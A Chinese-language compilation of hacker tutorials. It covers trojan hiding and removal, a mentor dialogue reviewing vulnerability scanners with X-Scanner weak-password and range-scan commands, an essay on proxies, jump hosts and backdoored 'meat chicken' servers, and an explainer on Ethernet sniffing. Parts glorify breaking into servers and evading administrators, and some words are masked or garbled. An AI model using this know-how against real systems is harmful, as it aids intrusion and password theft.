  木马都会很注意自己的端口,多达六万多中的端口很容易让我们迷失其中,如果你留意的话就会发现,通常情况下木马端口一般都在1000以上,并朝着越来越大的趋势发展。这主要是因为1000以下的端口是常用端口,况且用时占用这些端口可能会造成系统不正常,木马也就会很容易暴露;此外使用大的端口也会让你比较难发现隐藏其中的木马,如果使用远程扫描端口的方式查找木马,端口数越大,需要扫描的时间也就越多,故而使用诸如8765的端口会让你很难发现隐藏在其中的木马。

  四

  “既然木马如此的阴险,那么前辈有何可知木马的方法啊?”

  “现在的木马虽然阴险,但终究逃不过几个道理。平时出名的木马,杀毒软件就多数能够对付。但是现在木马种类繁多,有很多杀毒软件对付不了的。但是,只要我们谨记一下几个方法,就能够手到擒来。”

  “首先,我们可以选择端口扫描来进行判断,因为木马在被植入计算机后会打开计算机的端口,我们可以根据端口列表对计算机的端口进行分析。此外,查看连接也是一种好办法,而且在本地机上通过netstat -a(或某个第三方的程序)查看所有的TCP/UDP连接,查看连接要比端口扫描快,而且可以直观地发现与我们计算机连接的有哪些IP地址。当然,如果你对系统很熟悉的话,也可以通过检查注册表来进行木马的杀除,但是这个方法不适合于那些菜鸟级用户。查找木马特征文件也是一种好方法,就拿冰河来说……”

  “这个我知道前辈,木马冰河的特征文件一定是G_Server.exe。”

  “那有这么简单。冰河植入计算机后真正的特征文件是kernl32.exe和sysexlpr.exe。”

  “太狠毒了,一个跟系统内核文件一样,一个又像超级解霸。那么前辈我们把这两个文件删除掉,这冰河岂不就消失了。”

  “的确,你要是在DOS模式下删除了他们,冰河就被破坏掉了,但是你的计算机随之会无法打开文本文件,因为你删除的sysexplr.exe文件是和文本文件关联的,你还必须把文本文件跟notepad关联上。修改注册表太危险,你可以在Windows资源管理器中选择查看菜单的文件夹选项,再选择文件类型进行编辑。不过最简单的方法是按住键盘上的SHIFT键的同时鼠标右击任何一个TXT为后缀的文本文件,再选择打开方式,选中〖始终用该程序打开〗,然后找到notepad一项,选择打开就可以了。”

  “哈哈,按照前辈这么说来,我们只要抓住了这特征,天下的木马也奈何不了我们了。”

  

  黑客常用兵器之木马篇(下)

  五

  “哈哈,你可知道除了冰河这样的木马经常使用的隐身技术外,更新、更隐蔽的方法已经出现,这就是―驱动程序及动态链接库技术。驱动程序及动态链接库技术和一般的木马不同,它基本上摆脱了原有的木马模式―监听端口,而采用替代系统功能的方法改写驱动程序或动态链接库。这样做的结果是:系统中没有增加新的文件所以不能用扫描的方法查杀、不需要打开新的端口所以不能用端口监视的方法进行查杀、没有新的进程所以使用进程查看的方法发现不了它,也不能用kill进程的方法终止它的运行。在正常运行时木马几乎没有任何的症状,而一旦木马的控制端向被控端发出特定的信息后,隐藏的程序就立即开始运作。此类木马通过改写vxd文件建立隐藏共享的木马,甚是隐蔽,我们上面的那些方法根本不会对这类木马起作用。

  “可是前辈说的这种木马晚生并没有见到啊。”

  笨蛋!你没有见过,你怎么知道我老人家也没有见过?告诉你我已经看到了一个更加巧妙的木马,它就是Share。运行Share木马之前,我先把注册表以及所有硬盘上的文件数量、结构用一个监控软件 DiskState记录了起来,这个监控软件使用128bit MD5的技术来捕获所有文件的状态,系统中的任何文件的变动都逃不过他的监视,这个软件均会将它们一一指出。”

  “前辈我这里第一次运行Share后,系统好像没有动静,使用Dllshow(内存进程察看软件)观看内存进程,似乎也没有太大的变化。一般木马都会马上在内存驻留的,或许此木马修改了硬盘上的文件。”

  “好,那么你就接着用DiskState比较运行share.exe前后的记录。”

  “程序显示windows\applog里面的目录的一些文件和system.dat、user.dat文件起了变化,并没有其他文件的增加和修改。”

  “系统中的applog目录里面存放了所有应用程序函数和程序调用的情况,而system.dat和user.dat则是组册表的组成文件。你把applog目录里面的share.lgc打开来观看,它的调用过程是什么?”

  “调用过程如下:

  c15625a0 92110 "C:\WINDOWS\SYSTEM\OLEAUT32.DLL"

  c1561d40 c1000 "C:\WINDOWS\SYSTEM\OLE32.DLL"

  c1553520 6000 "C:\WINDOWS\SYSTEM\INDICDLL.DLL"

  c15d4fd0 2623 "C:\WINDOWS\WIN.INI"

  c15645b0 8000 "C:\WINDOWS\SYSTEM\SVRAPI.DLL"

  c1554190 f000 "C:\WINDOWS\SYSTEM\MPR.DLL"

  c154d180 a1207 "C:\WINDOWS\SYSTEM\USER.EXE"

  c1555ef0 13000 "C:\WINDOWS\SYSTEM\MSNET32.DLL"

  但是为什么前辈我们看不到MSWINSCK.OCX或WSOCK2.VXD的调用呢?如果木马想要进行网络通讯,是会使用一些socket调用的。”

  “那么接着你再观察注册表的变化。”

  “好像在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Network\LanMan下面,多了几个键值,分别是CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$,其内部键值如下:

  "Flags"=dword:00000302

  "Type"=dword:00000000

  "Path"="A:" 《-----路径是A到F

  "Parm2enc"=hex:

  "Parm1enc"=hex:

  "Remark"="黑客帝国"

  ”

  “这就对了,然后你在浏览器的地址栏输入\\111.111.111.1\CJT_C$。”

  “啊!居然把我的C盘目录文件显示出来了。”

  “现在你把CJT_C$改成matrix然后重启计算机,接着在浏览器的地址栏输入\\111.111.111.1\matrix。”

  “前辈也显示C盘目录文件了,很奇怪的是,在我的电脑里面硬盘看上去并没有共享啊?”

  “哈哈,那你再把"Flags"=dword:00000302的302改成402,reboot计算机。”

  “嘻嘻,硬盘共享已显示出来了。那么如何防止这种木马那?”

  “哈哈哈哈,这种木马只不过用了一个巧妙的方法隐藏起来而已。你现在把HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Network\LanMan下面的CJT_A$、CJT_C$、CJT_D$、CJT_E$、 CJT_F$全部删掉。如果你还放心不下,也可以把windows\system\下面的Vserver.vxd(Microsoft 网络上的文件与打印机共享,虚拟设备驱动程序)删掉,再把[HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Services\VxD\下的VSERVER键值删掉。这样就可以了。另外,对于驱动程序/动态链接库木马,有一种方法可以试试,使用Windows的〖系统文件检查器〗,通过〖开始菜单〗-〖程序〗-〖附件〗-〖系统工具〗-〖系统信息〗-〖工具〗可以运行〖系统文件检查器〗,用〖系统文件检查器〗可检测操作系统文件的完整性,如果这些文件损坏,检查器可以将其还原,检查器还可以从安装盘中解压缩已压缩的文件。如果你的驱动程序或动态链接库在你没有升级它们的情况下被改动了,就有可能是木马,提取改动过的文件可以保证你的系统安全和稳定。”

  六

  “此外很多人中木马都会采用如下手段:

  1.先跟你套近乎,冒充成漂亮的美眉或者其他的能让你轻信的人,然后想方设法的骗你点他发给你的木马。

  2.把木马用工具和其它的软件捆绑在一起,然后在对文件名字进行修改,然后修改图标,利用这些虚假的伪装欺骗麻痹大意的人。

  3.另外一种方法就是把木马伪装好后,放在软件下载站中,着收渔翁之利。

  所以我这里提醒你一些常见的问题,首先是不要随便从小的个人网站上下载软件,要下也要到比较有名、比较有信誉的站点,通常这些网站的软件比较安全。其次不要过于相信别人,不能随便运行别人给的软件。而且要经常检查自己的系统文件、注册表、端口等,而且多注意些安全方面的信息。再者就是改掉windows 关于隐藏文件后缀名的默认设置,这样可以让我们看清楚文件真正的后缀名字。最后要提醒你的是,如果有一天你突然发现自己的计算机硬盘莫名其妙的工作,或者在没有打开任何连接的情况下,猫还在眨眼睛,就立刻断线,进行木马的搜索。”

  

  黑客常用兵器之扫面篇(上)

  刀,兵器谱上排名第六。

  刀;

  一把好刀,光亮如雪;

  刃;

  一抹利刃,吹发即断;

  黑客手中的扫描器如同刺客手中之刀,杀人、保命;攻击、补漏。

  如果一个黑客手中没有一两个扫描器,那么他算不上是一个黑客,至少他是一个手里没有“刀”的黑客。没有“刀”的黑客是难以生存的……】

  “前辈,您为何如此看好扫描器?为什么黑客必须要有扫描器?”

  “后生,你上次木马害我不浅,你这次又像搞什么花样?”

  “上次小生只是跟前辈开了一个玩笑,还望前辈见谅。”

  “罢了,我老人家还不止于和你如此一般见识。此次你又有什么不清楚的?”

  “我不太清楚扫描器为何会像您所说的有如此大的威力,扫描器在黑客攻击中能起到什么作用?”

  “看来你现在也是一个手里没有刀的黑客,扫描器在一个成熟的黑客手里有着相当大的作用。因为进化到会用扫描器一级的黑客,他们就会很少有人在对那些无知的个人用户感兴趣,注意力更多的被吸引到了服务器上。而对付服务器最好的方法就是找到服务器系统的漏洞,或者服务器相关软件的漏洞。对于传统的手工查找来说,不但查找漏洞的速度过于缓慢,而且多数情况下只能针对某一个特定的漏洞,感觉有点大海捞针的味道。而扫描器就是一种快速寻找服务器系统相关漏洞的工具,通过它们,黑客可以根据自己的带宽和系统情况,以他们自己喜欢的速度和方式来快速的寻找系统漏洞,而且这多数扫描器可以同时扫描多种漏洞,很容易找到系统的漏洞和弱点,此时黑客就可以根据扫描器提供的漏洞报告和信息,采用合适的攻击方法对目标给以致命的一击。”

  “前辈,那我如何找到扫描器,平时我好像很少接触到这些东西啊。”

  “呵呵,你用过小榕的流光系列吗?”

  “这个当然是接触过了。”

  “其实小榕的流光就是一款结合强大扫描功能的软件,只不过他在流光中加入了一些攻击和破解成份。”

  “扫描器果然强大,我就曾用流光攻破过许多的黄色和非法内容,请删除网站,特别是他的FTP和新加入的SQLCMD功能,非常的强大。而且界面非常的友好,让我这种菜鸟用户很容易上手。”

  “你说的不错,但是虽然小榕的流光非常出色,并兼备强大的破解和攻击成份,但是总的来说它不能算的上是一个真正的扫描器。而且流光主要体现在破解,攻击性很强,没有太多的对目标系统扫描后的分析报告,所以流光在我看来只能算是是一个涵盖扫描功能的强大破解软件。”

  “那么在前辈的眼中,什么样的软件是一个强大的扫描软件,什么样的扫描器才能成为黑客手中的屠龙刀?”

  “一个好的扫描器必须有简洁和易于使用的操作界面,强大的分析和扫描信息范围,对最新漏洞的扫描判断能力(也就是通常所说的升级概念),详细的分析结果报告和对漏洞的描述与对策。这样的“刀”才能算的上是黑客手中的一把宝刀。”

  “前辈能否给我点评一下如今最为流行的扫描器的特点和性能呢?”

  “说道当今网络安全界流行的扫描器,其中最为优秀的就要算是ISS公司出品的商业扫描器了。它能针对上千种的系统和软件漏洞对服务器作出全面的细微扫描,而且能够生成比较详细的扫描报告,应该说是先进最好的扫描器了。”

  “前辈这个扫描器我可以从什么地方下载?”

  “无知!商业扫描器,当然是不能免费下载的了,你要花钱去买!”

  “还需要花钱啊,哪有没有不花钱的扫描器呢?”

  “当然有了,扫描器是黑客必备的工具之一,要是都花钱去买那不符合黑客的风格。我们可以在网上找到很多免费的而且同样很优秀的黑客扫描器。在国外比较常用的有Cerberus Internet Scanner简称CIS,还有乌克兰SATAN。我们国内的也有安全焦点的X-Scanner,与小榕的流光。”

  “前辈说的这几种扫描器我只用过流光,我个人认为流光很出色,其他的扫描器也只有所耳闻,但不知道有什么特点,还请前辈赐教。”

  “比起你用过的流光来说,ISS算得上是一个真正的管理员使用的系统扫描工具,首先它能扫描一些众所周知的系统漏洞和系统弱点,包括一些往往被用户忽略的问题,这些问题是一些经常被黑客利用的漏洞和弱点。ISS有更为强大的漏洞分析功能,并且它不会允许非法访问,但是实际情况是ISS已经背离了它的初衷目的。”

  “任何好的事物都有不利的一面,更何况一把刀,而且是把宝刀。”

  “这话不错,ISS的确是安全界最为出色的扫描器,而且他还是第一个可以公开得到的多层次扫描器。特别是它的可移植性和灵活性,众多的UNIX的平台上都可以运行ISS,ISS的扫描时间和效率也是很快的,很适合于企业级的用户。”

  “前辈,我插一句话,虽然ISS足够强大,但是它毕竟不是免费的午餐,这就不符合我们的黑客精神了。您那里有没有一些强大而且免费的扫描器?”

  “扫描器庞大的家族中怎么会没有免费的,你听说过NMAP吗?”

  “NMAP倒是有所耳闻,以前在许多安全网站上见到过这个名字,但是我不知道它是干什么用的一个东西。”

  “NMAP其实就是一个功能强大的扫描器。它的强大之处在于它支持UDP,TCP (connect),TCP SYN(half open),ftp proxy(bounce attack),Reverse-ident,ICMP(ping sweep),FIN,ACK sweep,Xmas Tree,SYN sweep,Null等多种扫描协议和扫描方式。但是总的来说它的最大的优点莫过于隐蔽性高,这是由于它采用的是“半开”的一种扫描方式,此外它提供的 Stealth FIN,Xmas Tree与Null扫描模式更是让被扫描者难以发现。也正是因为这一点的原因,NMAP深受一些骨灰级黑客的喜爱。像一般黑客喜欢的秘密扫描、动态延迟、重发与平行扫描、欺骗扫描、端口过滤探测、RPC直接扫描、分布扫描等,NMAP均可以实现,可以说NMAP是一个灵活性很大的扫描器。通过强大系统的扫描,它还可以分析出服务器的端口处于Open状态还是被防火墙保护状态。总之它的强大是不言而喻的,如果你有一台联网的Linux或者UNIX计算机,那么你就可以去http://www.insecure.org/nmap/下载得到它。

  

  黑客常用兵器之扫描篇(下)

  “前辈,我的系统使用的是Windows,您能不能介绍一些我这种菜鸟级黑客也能用的扫描器?当然前提是在Windows系统下运行啊。”

  “既然这样,我想Cerberus Internet Scanner(CIS)可能比较合适与你,它主要运行在Windows NT和Windows2000的平台下面,当然它也主要是针对微软的Windows操作系统进行探测扫描的。CIS拥有绝大多数菜鸟喜欢的Windows 友好界面,而且它提供进行扫描的安全问题也是通常在Windows中经常见到的,其中包括:

  (1) WWW服务

  (2) FTP服务

  (3) MS SQL Server 数据库扫描

  (4) NetBIOS 共享扫描

  (5) 注册表设置

  (6) NT服务漏洞

  (7) SMTP服务扫描

  (8) POP3服务扫描

  (9) RPC服务扫描

  (10) 端口映射

  (11) Finger服务

  (12) DNS安全扫描

  (13) 浏览器安全等

  在CIS中,它最为引人注目的还要数NetBIOS共享扫描。CIS能根据NetBIOS这一漏洞作出NETBIOS资源信息、共享资源、计算机用户名、工作组和薄弱的用户口令等详细的扫描分析。它的操作方法也是非常的容易,你只需要输入目标服务器的地址,然后选择你想要扫描的相关漏洞就可以进行扫描分析了。扫描完毕后他会主动生成一个HTML的报告共你分析结果。你可以在http://www.cerberus-infosec.co.uk/下载获得。”

  “这款扫描器的功能是否太过于简单了哪?我感觉它比起前几个您说的那些扫描器,功能过于少了,而且没有流光那么有成效。”

  “SATAN作为扫描器的鼻祖可能很适合你,由于它采用的是一个Perl的内核,通过PERL调用大量的C语言的检测工具对目标网站进行分析,所以你打开浏览器用IE方式就可以直接操作,使用也相对简单,我就不在这里介绍他浪费时间了。

  作为黑客的利刃,国产的CGI & Web Scanner也是一个不错的扫描器,这个宝刀是由zer9设计完成打造的。这款扫描器主要是针对动态网站技术的安全问题来设计的。”

  “动态网站?”

  “对,动态网站。随着网站设计的日趋复杂化,网站的技术人员会利用一些诸如CGI、ASP、PHP、jsP等网站动态交互技术与相应的服务软件对网站进行开发,这些东西大大地减轻了网站的维护和更新工作量,但是也正是这些技术,导致了大量的安全问题,特别是很多网站动态第三方程序在设计之初根本就没有对安全问题考虑太多,导致了大量的系统漏洞的出现。而CGI & Web Scanner就是专门针对这些动态的网页上出现的漏洞进行扫描的一把利刃。

  CGI & Web Scanner的主要功能有:

  (1) 检测203个已知的CGI漏洞

  (2) 通过HTTPD辨认服务器类型

  (3) 有更新漏洞的功能

  (4) Microsoft SQL Server DOS检测

  (5) Httpd Overflow检测

  (6) IIS Hack检测

  (7) ASP检测

  (8) DOT 漏洞检测

  而且它可以多线程扫描,并对常见的D.O.S(拒绝服务攻击)和Overflow等也进行探测,很适合初级杀手作为武器。至于你关心的使用方法,就更为简单了,输入目标服务器的IP地址,选择需要扫描的漏洞种类点击扫描按键,就开始了。”

  “没有想到国产扫描器还有如此优秀的!”

  “这个是自然,作为黑客的必备武器之一,国产扫描器有很多优秀的作品,前面我提到的安全焦点的X-Scanner,就是我最为欣赏的扫描器,而且我老人家也时常常的使用,但是不知道为什么,在对X-Scanner进行病毒测试的时候,熊猫和KV3000都能在X-Scanner里面发现两个木马程序。这一点是我们要非常的注意的。当然也要请安全焦点的朋友做做解释工作。”

  “前辈既然如此欣赏X-Scanner,那就给我详细介绍一下吧!”

  “X-Scanner运行在Windows平台下,它主要针对WindowsNT/Windows 2000操作系统的安全进行全面细致评估,可以扫描出很多Windows系统流行的漏洞,并详细的指出安全的脆弱环节与弥补措施。X-Scanner采用多线程方式对指定IP地址段(或单机)进行安全漏洞扫描,支持插件功能,提供了图形界面和命令行两种操作方式。

  扫描范围包括:

  (1)标准端口状态及端口banner信息;

  (2)CGI漏洞;

  (3)RPC漏洞;

  (4)SQL-SERVER默认帐户;

  (5)FTP弱口令;

  (6)NT主机共享信息;

  (7)用户信息;

  (8)组信息;

  (9)NT主机弱口令用户等。

  X-Scanner会将扫描结果保存在/log/目录中,index_*.htm为扫描结果索引文件。并对于一些已知漏洞,X-Scanner给出了相应的漏洞描述,利用程序及解决方案。X-Scanner扫描的内容是绝大多数的服务器容易出现的漏洞和安全设置问题。最常用的还是其中的SQL默认帐户、 FTP弱口令和共享扫描,他们能揭示出许多麻痹大意的网管犯的一些低级错误。”

  “前辈能不能具体说说X-Scanner如何使用呢?”

  “打开了X-Scanner,在扫描项目中可以任意的指定单独扫描哪一个特定的项目。比较多的是CGI和SQL或者FTP默认口令,这些都是很致命的服务器漏洞。”

  “下一步需要在〖扫描设置〗中进行参数的设置。一般的情况下,只对〖运行参数〗中的扫描范围进行设置。在那里只要填写网站服务器的IP地址就可以,可以填写一个来针对某一个特定的网站或服务器,也可以填写一个IP段范围,来扫描一段IP地址上所有的计算机。具体扫描参数格式如下:

  1.命令行:Xscan -h [起始地址]<-[终止地址]> [扫描选项]

  其中的[扫描选项]含义如下:

  -p: 扫描标准端口(端口列表可通过\dat\config.ini文件定制);

  -b: 获取开放端口的banner信息,需要与-p参数合用;

  -c: 扫描CGI漏洞;

  -r: 扫描RPC漏洞;

  -s: 扫描SQL-SERVER默认帐户;

  -f: 尝试FTP默认用户登录(用户名及口令可以通过\dat\config.ini文件定制);

  -n: 获取NetBios信息(若远程主机操作系统为Windows9x/NT4.0/2000);

  -g: 尝试弱口令用户连接(若远程主机操作系统为Windows NT4.0/2000);

  -a: 扫描以上全部内容;

  -x [代理服务器:端口]: 通过代理服务器扫描CGI漏洞;

  -t: 设置线程数量,默认为20个线程;

  -v: 显示详细扫描进度;

  -d: 禁止扫描前PING被扫主机。

  2.示例:

  Xscan -h xxx.xxx.1.1-xxx.xxx.10.255 -a

  含义:扫描XXX.XXX.1.1-XXX.XXX.10.255网段内主机的所有信息;

  Xscan -h xxx.xxx.1.1 -n -g -t 30

  含义:获取XXX.XXX.1.1主机的Netbios信息,并检测NT弱口令用户,线程数量为30;

  Xscan -h xxx.xxx.1.1 -p -b -c -x 129.66.58.13:80 -v -d

  含义:扫描xxx.xxx.1.1主机的标准端口状态,通过代理服务器"129.66.58.13:80"扫描CGI漏洞,检测端口banner信息,且扫描前不通过PING命令检测主机状态,显示详细扫描进度。”

  “在〖运行参数〗中,有很大的选择余地,比如它可以设置代理服务器来躲避网管的追查,并课以设置扫描的线程。对扫描显示也可以进行详细的选择。然后扫描器就开始工作了。”

  “好啊,我去试试。”

  “另外我要提醒你注意的是,在使用这些扫描软件的时候一定要看清楚里面有没有可以的程序,以防自己先中了别人的招。此外,虽然你刺客手中有刀,但是现在的网站管理员也会使用这些宝刀,所以说,手中有绝世好刀,不一定就能杀死所有的敌人。好了,你去吧!”

  

  代理、肉鸡、跳板的概念

  看到有的网友还用那种8080、80端口的代理,我有话说,也可以说为大家做一点最最基础的黑客教程,大家看完自己去做吧,具体怎么做,我就不说了,可以说我把我所知道的肉鸡和跳板的概念知识全部告诉大家了,我也在几个地方发表过,这是我的原创,我要告诉大家的是真正在黑客抢劫服务器是用的跳板是什么,以及黑客们很少说的跳板知识介绍~~~~~~~~~~我有个习惯,

  总是喜欢让大家看一篇文章的时候知道:为 什么要看这篇文章?这篇文章要让

  自己知道或是学到什么东西,我尽量把自己所 掌握的东西尽量简化后用通俗的

  语言表达。大家看完后有什么不好的地方,请指出,我好学习到新的东西,我很高兴自己能

  把自己所学到的东西和大家分享,在 这里的认识的网友们有想成为黑客的;有

  想随便玩玩;有的想学,但是不久就感

  觉学网络安全很难就退却了。我真的很希望大家能找到自己的目标,做自己喜欢

  的事情,不要一天就黑小企鹅和一天泡在别人的软件里(至少要尝试读一些简单的

  代码),学习黑客知识是孤独的,必须完全靠自己的努力,很少有人能帮你的,

  开始你会觉得很无助,但是慢慢的,你将习惯这种感觉和方式,要自己努力才会

  有成果的,我和大家一样也在不停的探索网络知识,现在不过是把自己学到的东

  西和大家分享罢了。是不是我象大姨妈啊!!呵呵~~~婆婆***!我看到很

  多的网友聊代理的时候,概念很模糊,甚至搞出了笑话,所以今天我就谈谈很多

  朋友初涉网安的一个

  误区(认识代理、跳板、肉鸡)。有的网友说那还不简单,找个运行就能隐藏IP

  的软件,我早说过了,我没有见过这种软件或许说根本不存在这种软件(懒惰的

  人更勤于此道)再者对抢劫服务器者而言把自己的身家性命放在一个隐藏自己IP的软件

  上是很不明智的,要知道抢劫服务器时会尝试很多的连接,在你一不小心的时候你就把

  自己卖了(我曾经在一次抢劫服务器完毕后没有用sc32设置好跳板的IE,而是随手在

  桌面上双击浏览器去看黑页,结果把自己给卖了,本来没有什么可怕的,但是我

  们要养成做任何事都无懈可击的习惯。再者~~~嘘嘘~~还好是曰本鬼子的系统

  。)所以我根本不相信什么隐藏IP的软件,也许我孤陋寡闻或是真有这样的东西

  ,但至少我是不会用的,除非有人张罗着把我毙了,那么我可以考虑一下。

  我要说此文适合菜鸟阅读,高手止步!!!

  我上小企鹅,老有网友问我代理和跳板以及肉鸡是指同一类概念吗?它们怎么样工

  作的?

  因为在小企鹅上不可能讲很清楚,涉及的东西太多了,因为此文是面向和我一样初

  人涉网络网络安全的朋友,那么我就简单的说说。

  首先是代理(泛指80;8080;1080端口),很多网友认为用代理猎手设置好

  端口之后就可以为自己找个代理在IE、FTP等里面设置后来隐藏IP,这就是肉鸡

  或认为这就是跳板,其实不然,为什么呢?就我个人来看这样的代理简直就是垃

  圾(有的网友不服气了,等等,我一会告诉你为什么我这么说),1、首先一个

  速度比较慢,我用这样的代理用过很多国家,包括国内的,感觉都是其慢,没有

  那种快速的感觉;2、不稳定。大家一定都想拥有一个稳定的代理吧~~~呵呵

  但是这样的代理通常有原因的,不是服务器自身漏洞就是为了自身利益而增加的

  服务,当他的愿望达成以后或是网管发现以后,你就不能再用了。3、多人使用。如果你

  用8080、1080、80等端口的代理,我敢保证这个代理不止你一个人用,如果

  你想成为一个黑客或是老手的话,拥有一个自己的代理是必须的。4、保密性。

  有的代理服务器提供者很可恶,他们利用代理得知你的密码或一些敏感信息,因

  为普通代理数据没有经过加密(1080端口除外),用一个嗅探器就可以知道你

  输入的数据,别忘了代理的最最基本原理是数据转发哟。好了,有了以上的缺点

  你还敢用或是有信心用它吗?这就是我为什么叫它垃圾的原因了。有网友会问:

  那什么样的代理才没有这些缺点呢?别急,我下面就要说。

  socks5.这是一个很不错的跳板软件,很小(32K)功能却是不凡,它是sock4

  的接替者,原来的sock4只支持UDP协议(这个大家去看书吧,我不多说了),

  而sock5支持USP和TCP两种协议,还有数据的传输是加密的所以真的很佩服作者的编程能力。如果你简

  单的使用它,那你上个小企鹅啊或IRC啦,那是没有什么问题啦,而且它的速度很快

  几乎和你使用本地机没有什么差别(当然不能加太多跳板),sock5支持你搭建

  255个跳板,也就是你可以用skserverGUI来编辑多达255个安装了sock5的机

  器来运行达到你隐藏IP的目的,但我想如果我看见有人这样做的话,我会马上打

  电话到精神病院~~~:)而且用sc32来配合skserverGUI的话,那么你的电脑

  几乎就没有应用程序不能用代理的。你用过之后一定会说:我喜欢!我选择!sock5的安装也很简单,在此软件的说明书里有,因为我主要是让大家了解代理-- ----&g*;跳板------&g*;肉鸡的简单原理;再者因为制作这样的跳板或肉鸡很有攻击性(会构成非法使用

  他人电脑),而且网上有很多人不自觉,我可不想以后有人被抓了,说我

  曾经为他的犯罪生涯做过贡献。

  好了!最后我们来说说肉鸡吧

  肉鸡是什么?在小企鹅上也有朋友问我,我认为这是中国黑客对自己开了后门的服

  务器为将来自己做一些事时使用的机器的一种自豪而又亲切的叫法.肉鸡是老手

  常用的代理,也就是*elne*的那种,完全是靠自己制作的,端口加密码啦!绝对

  只有你一个人用,当然被别人提前下手的话,那你就清除它的后门就可以了,当

  你第一次拥有这种服务器的时候你的心情是什么样的?我个人感觉是象初恋一样

  。

  有3389肉鸡通常可以图形化*作,从而发动拒绝服务攻击,那么我们用什么样

  系统的肉鸡呢?~~~~恩!marke这个

  问题问的很好~~:)

  我喜欢用windows 2000和linux,虽然我一直采用WIN 2000但是告诉大家一个

  好消息我刚刚拥有了自己第一台LINUX肉鸡,对我这个正在学习LINUX的家伙来

  说,没事到上面熟悉一下LINUX指令是件很愉快的事。要想学用这种肉鸡必须熟

  练DOS指令(指windows),因为没有图形界面让你玩的。做一个黑客必须适应字符化的*作

  当你*elne*到一台你服务器里(肉鸡)

  你就可以踏雪无痕了,就象“信息公路牛崽”(抢劫服务器五角大楼的美国天才黑客)一

  样先连接到曰本、到中东、再绕回美国本土抢劫服务器五角大楼,听上去很神秘吧,其

  实用的原理就是这个。

  网络监听概念

  网络监听工具的提供给管理员的一类管理工具。使用这种工具,可以监视网络的状态、数据流动情况以及网络上传输的信息。

  但是网络监听工具也是黑客们常用的工具。当信息以明文的形式在网络上传输时,便可以使用网络监听的方式来进行攻击。将网络接口设置在监听模式,便可以源源不断地将网上传输的信息截获。

  网络监听可以在网上的任何一个位置实施,如局域网中的一台主机、网关上或远程网的调制解调器之间等。黑客们用得最多的是截获用户的口令。

  什么是网络监听

  网络监听是黑客们常用的一种方法。当成功地登录进一台网络上的主机,并取得了这台主机的超级用户的权限之后,往往要扩大战果,尝试登录或者夺取网络中其他主机的控制友。而网络监听则是一种最简单而且最有效的方法,它常常能轻易地获得用其他方法很难获得的信息。

  在网络上,监听效果最好的地方是在网关、路由器、防火墙一类的设备处,通常由网络管理员来操作。使用最方便的是在一个以太网中的任何一台上网的主机上,这是大多数黑客的做法。

  以太网中可以监听的原因

  在电话线路和无线电、微波中监听传输的信息比较好理解,但是人们常常不太理解为什么局域网中可以进行监听。甚至有人问:能不能监听不在同一网段的信息。下面就讲述在以太网中进行监听的一些原理。在令牌环中,道理是相似的。

  对于一个施行网络攻击的人来说,能攻破网关、路由器、防火墙的情况极为少见,在这里完全可以由安全管理员安装一些设备,对网络进行监控,或者使用一些专门的设备,运行专门的监听软件,并防止任何非法访关。然而,潜入一台不引人注意的计算机中,悄悄地运行一个监听程序,一个黑客是完全可以做到的。监听是非常消耗CPU资源的,在一个担负繁忙任务的计算机中进行监听,可以立即被管理员发现,因为他发现计算机的响应速度令人惊奇慢。

  对于一台连网的计算机,最方便的是在以太网中进行监听,只须安装一个监听软件,然后就可以坐在机器旁浏览监听到的信息了。

  以太网协议的工作方式为将要发送的数据包发往连在一起的所有主机。在包头中包含着应该接收数据包的主机的正确地址。因此,只有与数据包中目标地址一致的那台主机才能接收信包。但是,当主机工在监听模式下,无论数据包中的目标物理地址是什么,主机都将接收。

  在Internet上,有许多这样的局域网。几台甚至十几台主机通过一条电缆一个集线器连在一起。在协议的高层或用户看来,当同一网络中的两台主机通信时,源主机将写有目的主机IP地址的数据包发向网关。但是,这种数据包并不能在协议栈的高层直接发送出去。要发送的数据包必须从TCP/IP协议的IP层交给网络接口,即数据链路层。

  网络接口不能识别IP地址。在网络接口,由IP层来的带有IP地址的数据包又增加了一部分信息:以太帧的帧头。在帖头中,有两个域分别为只有网络接口才能识别的源主机和目的主机的物理地址,这是一个48位的地址。这个48位的地址是与IP地址对应的。也就是说,一个IP地址,必然对应一个物理地址。对于作为网关的主机,由于它连接了多个网络,因此它同时具有多个IP地址,在每个网络中,它都有一个。发向局域网之外的帧中携带的是网关的物理地址。

  在以太网中,填写了物理地址的帧从网络接口中,也就是从网卡中发送出去,传送到物理的线路上。如果局域网是由一条粗缆或细缆连接机而成,则数字信号在电缆上传输,信号能够到达线路上的每一台主机。当使用集线器时,发送出去的信号到达集线器,由集线器再发向连接在信线器上的每一条线路。于是,在物理线路上传输的数字信号也能到达连接在集线器上的每一主机。

  数字信号到达一台主机的网络接口时,在正常情况下,网络接口读入数据帧,进行检查,如果数据帧中携带的确良物理地址是自己的,或者物理地址是广播地址,则将数据帧交给上层协议软件,也就是IP层软件,否则就将这个帧丢弃。对于每一个到达网络接口的数据帧,都要进行这个过程。然而,当主机工作在监听模式下,则所有的数据帧都将被交给上层协议软件处理。

  局域网的这种工作方式,一个形象的例子是,大房间就像是一个共享的信道,里面的每个人好像是一台主机。人们所说的话是信息包,在大房间中到处传播。当我们对其中某个人说话时,所有的人都能听到。但只有名字相同的那个人,才会对这些话语做出反映,进行处理。其余的人听到了这些谈话,只能从发呆中猜测,是否在监听他人的谈话。

  当连接在同一条电缆或集线器上的主机被逻辑地分为几个子网时,如果一台主机处于监听模式下,它还能接收到发向与自己不在同一子网(使用了不同的掩码、IP地址和网关)的主机的那些信包。也就是说,在同一条物理信道上传输的所有信息都可以被接收到。

  许多人会问:能不能监听不在同一个网段计算机传输的信息。答案是否定的,一台计算机只能监听经过自己网络接口的那些信包。否则,我们将能监听到整个Internet,情形会多么可怕。

  目前的绝大多数计算机网络使用共享的通信信道。从上面的讨论中,我们知道,通信信道的共享意味着,计算机有可能接收发向另一台计算机的信息。

  另外,要说明的是,Internet中使用的大部分协议都是很早设计的,许多协议的实现都是基于一种非常友好的,通信的双方充分信任的基础之上。因此,直到现在,网络安全还是非常脆弱的。在通常的网络环境下,用户的所有信息,包手户头和口令信息都是以明文的方式在网上传输。因此,对于一个网络黑客和网络攻击者进行网络监听,获得用户的各种信息并不是一件很困难的事。只要具有初步的网络和TCP/IP协议知识,便能轻易地从监听到的信息中提取出感兴趣的部分。

  网络监听常常要保存大量的信息,对收集的信息进行大量的整理工作,因此,正在进行监的机器对用户的请求响应很慢。

